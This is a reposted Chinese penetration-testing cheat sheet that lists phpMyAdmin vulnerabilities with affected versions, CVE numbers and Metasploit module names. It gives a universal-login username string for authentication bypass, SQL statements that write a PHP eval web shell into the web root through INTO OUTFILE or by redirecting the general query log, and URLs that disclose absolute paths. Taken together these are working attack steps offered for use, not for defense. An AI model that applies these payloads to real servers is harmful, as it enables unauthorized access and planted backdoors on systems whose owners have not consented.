zoukankan      html  css  js  c++  java
  • jQuery火箭图标返回顶部代码

    原作者:热爱网络安全的小菜狗
    原文链接:phpMyadmin各版本漏洞

    0x01 PREGREPLACEEVAL漏洞

    影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG

    利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238
    ——————————————————————————————————————

    0x02 serversync.php 后门漏洞

    影响版本:phpMyAdmin v3.5.2.2

    利用模块:exploit/multi/http/phpmyadmin3522_backdoor CVE: CVE-2012-5159
    ——————————————————————————————————————

    0x03 PhpMyAdmin配置文件/config/config.inc.php存在命令执行

    影响版本: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1;

    利用模块:exploit/unix/webapp/phpmyadmin_config CVE: CVE-2009-1151
    ——————————————————————————————————————

    0x04 万能登陆

    影响版本:2.11.3 / 2.11.4

    利用方法:用户名处写入'localhost'@'@"则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)
    ——————————————————————————————————————

    0x05 phpmyadmin配合phpinfo getshell

    影响版本:2.8.0.3

    https://www.t00ls.net/thread-37889-1-1.html
    ——————————————————————————————————————

    0x06 phpmyadmin写文件/改变量

    写文件:

    show global variables like ‘% secure-file-priv %’
    

    如果该参数设置为空或者指定文件夹可以利用:

    select “<?php @eval($_POST[k];?)>” into outfile “/var/www/html/conf.php”
    

    改变量:

    show variables like ‘%general%’;
    set global general_log = ‘on’;
    set global general_log_file=’/var/www/html/conf.php’;
    

    https://www.cnblogs.com/shayanboy/p/11769105.html

    ——————————————————————————————————————

    0x07 附上几个php爆绝对路径的办法:

    phpMyAdmin/libraries/selectlang.lib.php

    phpMyAdmin/darkblueorange/layout.inc.php phpMyAdmin/index.php?lang[]=1

    phpmyadmin/themes/darkblue_orange/layout.inc.php

  • 相关阅读:
    leetcode-Minimum Path Sum
    第三十二章 自说明代码
    第三十一章 布局与风格
    第三十章 编程工具
    第二十九章 集成
    第二十八章 管理构建
    第二十五章 代码调整策略
    第二十六章 代码调整技术
    第二十七章 程序规模对构建的影响
    第二十四章 重构
  • 原文地址:https://www.cnblogs.com/-mo-/p/11690029.html
Copyright © 2011-2022 走看看